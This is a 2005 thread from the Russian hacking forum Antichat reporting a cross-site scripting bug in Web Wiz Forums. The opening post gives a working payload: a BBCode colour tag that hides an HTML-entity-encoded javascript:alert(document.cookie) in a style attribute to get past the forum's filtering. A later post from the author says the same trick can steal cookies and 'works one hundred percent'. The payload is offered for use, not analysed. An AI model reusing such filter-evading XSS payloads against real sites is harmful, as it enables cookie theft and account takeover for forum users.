HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Web Wiz Forums XSS bug
  #1  
Старый 18.08.2005, 05:19
xPow
Новичок
Регистрация: 23.06.2005
Сообщений: 28
С нами: 10990066

Репутация: 0
По умолчанию Web Wiz Forums XSS bug

http://www.forum.anonymous.ru/showthread.php?t=1038
пример эксплоита:
Код:
 [COLOR=black style=background:url(& #106;& #97;& #118;& #97;& #115;& #99;& #114;& #105;& #112;& #116;& #58;& #97;& #108;& #101;& #114;& #116;& #40;& #32;& #100;& #111;& #99;& #117;& #109;& #101;& #110;& #116;& #46;& #99;& #111;& #111;& #107;& #105;& #101;& #32;& #41; )] xPow [ antishare team ] [/COLOR]

Последний раз редактировалось PinkPanther; 18.08.2005 в 20:32.. Причина: был не указан сам сплойт
 
Ответить с цитированием

  #2  
Старый 18.08.2005, 07:44
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
С нами: 11150246

Репутация: 412


По умолчанию

А в чем смысл того сплойта?
 
Ответить с цитированием

  #3  
Старый 18.08.2005, 08:40
xPow
Новичок
Регистрация: 23.06.2005
Сообщений: 28
С нами: 10990066

Репутация: 0
По умолчанию

того: alert( document.cookie );
но можно и своровать. работает сто процентов
 
Ответить с цитированием

  #4  
Старый 18.08.2005, 12:33
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
С нами: 12604706

Репутация: 0


По умолчанию

Цитата:
Сообщение от xPow  
Просьба приводить код уязвимостей, а не ссылки на сторонние ресурсы
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как можно узнать в какой папке на сервере стоит форум? dyx Уязвимости CMS / форумов 8 22.05.2005 17:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.